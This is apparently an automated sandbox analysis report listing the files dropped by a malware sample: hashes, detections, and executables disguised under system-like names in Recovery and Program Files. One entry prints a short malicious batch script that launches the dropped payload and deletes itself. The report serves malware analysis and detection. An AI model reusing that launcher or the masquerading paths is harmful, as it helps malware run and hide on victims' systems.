                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                    C:\Program Files\Windows Multimedia Platform\9e60a5f7a3bd80

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with very long lines (808), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):808
                                                                                    Entropy (8bit):5.904553050193508
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:SWdW8SqhrBATGKlfPxXKZaE4IJ+5Qa3aPx5kGl5E8Xuo68ikse64rLDnTcfXL/uv:kqKTBE4IJ+nKjnV6FX4r3nTc/K06P0Pi
                                                                                    MD5:1331CA20B77D7ED8AEB1DA6CD97DFF68
                                                                                    SHA1:BED2472C1483CE7B3792B2FDA605ACB13143AB7A
                                                                                    SHA-256:3C224326CE1F276DA1FF873657A79D8323455B62550A39D5E1EDAE808E31A1F7
                                                                                    SHA-512:1FFD1FD34F8E67D3E19DC0B644E938FFA68ABF59605AD54AE7EDBA30B188C5B328C20175282C87D3E08DACF38B823F06178E7049F18941AD015FCE98C1F616F7
                                                                                    Malicious:false
                                                                                    Preview:kOWOByqTr54rtUMkgw8L5ixcwjvTxCcE2eRhkjRQkc3bcGsKFVhkqX2Cb3ccCXgod0zPDp97fskdpVAp0kObf2XflPGrHzNN5O8mRdHZWkE8wZWF3wmcJFJlcUnyjS0qeWhaXXXXdyF5xZsM2AyUMvE0FXK7zT0DuYdZ15rfZO8UAOyCla5iefdsSrVANahK8BLY5SV6TS58xu00jHWYXRjO5uHJjrS8ryV8DZGSF9PLkf5i1fbGDJwrb6cKLLWlA6Q8Y1xJADTXBYnayiSEQM5iBohG66G4moLoO7K9rRF9zYpDTCVn2RVyBs6uUqME7YvXM9L1YSX8G5sm8ex3kcBVSXngAZpAEBCbnR0T0ePk4WrGATwz3TeeXaFzVp18mW3F2R9qndCFNba6phfqnzHvghDNMB8LnQ7hcmNsUFMZQYQ69IJyJKVwPIiUNvelf1c7d2dDTxVhnrfIQHND1JBc4KSUD2filk4Y5TcGpFeWyxJhmZDGhauV0ACTkIAbSx6CwGN7oHYvopoHBurnyYAK0ii5QJggFDEB0GugMGbaC8rLW5RzbWn3wvMOiSrfk1qlkmQ4ALbs7jI21XiU1rFtZLOF4g74Z50LSFktpXzP546MnTXKtWo3v6LZYK9dNgTBt7kvwzod20xeOCckJxLCR6ZV3LVeXVBYl4cptlX3rKB4IqKWsZUaVQtwhO2ldKGgyY2Ujw0hZRVG5eMMA9w8BlDVKqHfswahEeGux0w5iwBE5n1CCpkeXIfMVhJ3pVyn1xCaYcYKM0aOk9ahyEcDL5J693YQr3QM7XNH

                                                                                    C:\Program Files\Windows Multimedia Platform\SystemSettings.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                    Category:dropped
                                                                                    Size (bytes):1560958
                                                                                    Entropy (8bit):7.974265283144141
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:K17t7ROjwJqMAVS2hEijP79eAPkavlCCyYcBoZ11q8UuZPt5PsuWg:KBt7R0wJ4L5Uw5lCCyG31oIPmg
                                                                                    MD5:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    SHA1:B63D8E25D4EB9ABEA3ED0F7867F70DB2AB18CBA2
                                                                                    SHA-256:CB4626AD921C63113E18C3AEFB109F70C8E334089871133EA675D62D836D810B
                                                                                    SHA-512:FF51CCD8918344BB0439A4D9E39394383BFF2196496D778DB9A3D2862479E55F1BF59C7D467FF055C721231CB592C3C7DED63C5AF28A3F9552DC6421DD1151BF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                                    C:\Program Files\Windows Multimedia Platform\SystemSettings.exe:Zone.Identifier

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                    C:\Recovery\7d910c5fdacb20

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with very long lines (517), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):517
                                                                                    Entropy (8bit):5.879614544419959
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:GPin0ZTxosgH5xKY7GYKMkTqa5MTUIhncpliFkP:GangTypK/qzdhcpl5P
                                                                                    MD5:8C5B957AE5381680A29CF531E70EC3C0
                                                                                    SHA1:A1398FEAEB4419257E50288B152514F3D0EDA288
                                                                                    SHA-256:133693D63070C4223A50890A7121F23972791E2BABA4A4CBD8A40EAE32BFB576
                                                                                    SHA-512:43C12A969AFFE99CCE7A788FB3DB2E0CE7783626567452260BD10697B1030EA3BF54FF59C542393AFB2E36B8C6095B43B4AB193531EE57FE88FD08B8C17B28A5
                                                                                    Malicious:false
                                                                                    Preview:jscPqhtS9MKzKDXMOZG0ilLEeFXCYAGoYw6nX8i2k7vQKqn9bzDGJC78gYukKr48GgaYHuyP0NPkz53xcXli69eWy8G9N7s3CxKnQP2qBxQ5xXIle6IwGWBGBDjJnzB2fVhCuPhNf4hJtijbzffQz5wqvDmMpsDLwXabzG0OZ4RMy2XcdHUITuDjj1QrnUhw0VWVIImsoR14oj12pJsiY51BU018zJkEXeWdfBUVfmdC3I599YBel9Y5dVBSQo2fqwhKNYWnyXCwbzIL528bHFcXGa9KACF1t8VGkvvkBYpO6leoNzWXpaYkUJDxYLnwSLCddBlJHXZtaObe6V7KprLTkuwbr8Mzv36vjBKLONQRApKGsi0DOcGlAt2sPKcJLk7gRp55Kw6ca3S4kqsIHJlSxVvzIb5EuHGaroyCn52bfoKGa7IjbUBC8pt64Fxt02sTx2N52pfMQJxJKoZKTWmaFDbC41HhHJln61ShuMrwyzvz2kvQqnZeQRNtbLBAh7EHi

                                                                                    C:\Recovery\USZqVcJFLA.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                    Category:dropped
                                                                                    Size (bytes):1560958
                                                                                    Entropy (8bit):7.974265283144141
                                                                                    Encrypted:false
                                                                                    SSDEEP:24576:K17t7ROjwJqMAVS2hEijP79eAPkavlCCyYcBoZ11q8UuZPt5PsuWg:KBt7R0wJ4L5Uw5lCCyG31oIPmg
                                                                                    MD5:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    SHA1:B63D8E25D4EB9ABEA3ED0F7867F70DB2AB18CBA2
                                                                                    SHA-256:CB4626AD921C63113E18C3AEFB109F70C8E334089871133EA675D62D836D810B
                                                                                    SHA-512:FF51CCD8918344BB0439A4D9E39394383BFF2196496D778DB9A3D2862479E55F1BF59C7D467FF055C721231CB592C3C7DED63C5AF28A3F9552DC6421DD1151BF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.

                                                                                    C:\Recovery\USZqVcJFLA.exe:Zone.Identifier

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:true
                                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\JNKHlxGvw4.exe.log

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1830
                                                                                    Entropy (8bit):5.3661116947161815
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4vtd
                                                                                    MD5:4E98592551BD0B069F525D5145C4AB1D
                                                                                    SHA1:F76B60DC100FAB739EB836650B112348ED7B9B97
                                                                                    SHA-256:171B3D8F6F3559D645DECCA2C9B750EBFD5511B6742C0157C60F46EAD6CC4F5E
                                                                                    SHA-512:E5C520597C414A3F73AF0C4F2E2A61CE594D8CEC7FF103D94CCAEA905E0D5F6AF32CFAB40026865AE86172904F927B928663C9FA4B0EBD397CC450BF124A318D
                                                                                    Malicious:true
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):1281
                                                                                    Entropy (8bit):5.370111951859942
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SystemSettings.exe.log

                                                                                    Download File
                                                                                    Process:C:\Program Files\Windows Multimedia Platform\SystemSettings.exe
                                                                                    File Type:CSV text
                                                                                    Category:dropped
                                                                                    Size (bytes):1281
                                                                                    Entropy (8bit):5.370111951859942
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\USZqVcJFLA.exe.log

                                                                                    Download File
                                                                                    Process:C:\Recovery\USZqVcJFLA.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):1613
                                                                                    Entropy (8bit):5.370675888495854
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHmHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktGqZ4x
                                                                                    MD5:CFCC907668E9B1AED46D457F77536393
                                                                                    SHA1:5FD7371DBA3004E2BC1A83BA5C8AD4BD90FC2D28
                                                                                    SHA-256:414415C15FF1C315E383F642F353A36B24005E012073C05CC72A71173D6604CF
                                                                                    SHA-512:405A279EA079FAF8C38926EE256DEB2A4541C9752836C5BDE3E435A3437A3E95F086B1A4911BF19440341011771D46E1B1364C5FECEB21277EC0683367DFA4AE
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:modified
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):1.1510207563435464
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlllullkv/tz:NllU+v/
                                                                                    MD5:6442F277E58B3984BA5EEE0C15C0C6AD
                                                                                    SHA1:5343ADC2E7F102EC8FB6A101508730898CB14F57
                                                                                    SHA-256:36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
                                                                                    SHA-512:F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
                                                                                    Malicious:false
                                                                                    Preview:@...e................................................@..........

                                                                                    C:\Users\user\AppData\Local\Temp\8DlY2DY8qp.bat

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):154
                                                                                    Entropy (8bit):5.259308370552018
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7kC4jpCCvBktKcKZG1t+kiE2J5xAIP8zVzERHn:hCRLuVFOOr+DE7g/vKOZG1wkn23fE2h
                                                                                    MD5:1163C14F35E80C196F0C5D4066B721E5
                                                                                    SHA1:8B3E500A1BA3D3DCBBA848C5E6EFF90CA4ADB4B6
                                                                                    SHA-256:D1BC7C05C7DD723980C14D3B03DDF5DB3F891FF67234BD6AC56E70E6F0811325
                                                                                    SHA-512:90A2F7065E2C74BAB3856D27EE14D5A5BB0D0F4DFC46A545C04BC3839EF77BA87D32F2CA73917D3771164E8F66A057CFE0EBC2EFBB3D1B5AA7C0368CF843CB36
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\USZqVcJFLA.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\8DlY2DY8qp.bat"

                                                                                    C:\Users\user\AppData\Local\Temp\RES5227.tmp

                                                                                    Download File
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Tue Dec 10 19:07:49 2024, 1st section name ".debug$S"
                                                                                    Category:dropped
                                                                                    Size (bytes):1952
                                                                                    Entropy (8bit):4.555811178058874
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:H8bW96XOglDfHUcfwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:Fe0BKhmMluOulajfqXSfbNtmh5Z
                                                                                    MD5:A1FA7BDE4C8579384927F90A2E76E463
                                                                                    SHA1:94FA3E01761E058DFB44F0F255240BB7CD944609
                                                                                    SHA-256:637152CA22FEF671D1386F593E035F550DA436BA7C899F8E2C6C4AA061EE5736
                                                                                    SHA-512:62D86F5084DE1077DA404FDBE72C2FE82774B38A9588EC7D851859FF36F7911FE9BC7FBA45B24C6070AD930FDBE8A5FFC01430740090DFEA619663A1CD649EBD
                                                                                    Malicious:false
                                                                                    Preview:L.....Xg.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES5227.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

                                                                                    C:\Users\user\AppData\Local\Temp\ZefI1094Bb

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):25
                                                                                    Entropy (8bit):4.323856189774724
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:KUDm2RR:KUDnR
                                                                                    MD5:13BC55E6BB37B4A988AD6FF343EEB93C
                                                                                    SHA1:42056EB7400D02C6B4FF8D27167E45C61809D052
                                                                                    SHA-256:1FEA7F84C667CF6F3068B9B7E132E1BB3B993C27A0E62A047477614D162ABDB4
                                                                                    SHA-512:D48E613FE1A21A12BC4E87828D24A41997DD846B52C4FEFE50A1AE42450E09779EC023B334AC5A05EA5CC659F987F7D6B2A8F7ED9D7667FD0B3AC1A7C3347F51
                                                                                    Malicious:false
                                                                                    Preview:JCPTy8vfyr1PrHOwbkD8ou5GY

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ggswgcm.43l.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4uprvkrz.nz5.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5i33jbws.npd.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qbp4zfh.b4f.ps1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a22vghj5.ev5.psm1

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
